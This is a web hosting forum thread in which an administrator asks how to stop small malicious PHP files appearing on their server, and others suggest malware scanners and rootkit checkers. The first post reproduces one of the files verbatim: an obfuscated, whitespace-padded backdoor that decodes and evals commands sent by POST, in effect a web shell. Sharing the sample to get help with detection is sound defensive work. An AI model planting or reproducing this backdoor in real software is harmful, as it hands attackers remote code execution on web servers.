How to protect the server against malware

[Spacedust]

It happen on random users and domains - something is creating 510 bytes file with entires like that:

<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n78cd5a'])) {eval($s21(${$s20}['n78cd5a']));}?>

[fossxplorer]

Do you use CSF and/or LMD (Linux Malware Detect)?

[Spacedust]

No

[dkstiler]

Have you tried to see if your server is infected on with rkhunter or similar tools for rootkits or worms etc ?

Else this attacks could happen remotely exploiting some user account that has easy passwords that can be brute forces .. or dictionary attacks ..

[fossxplorer]

How do your servers survive all the spammers and attacks?
And IMHO, LMD does a much better job than RKHunter.

No

[Spacedust]

We use sendmail-limiter and scan infected files with clamscan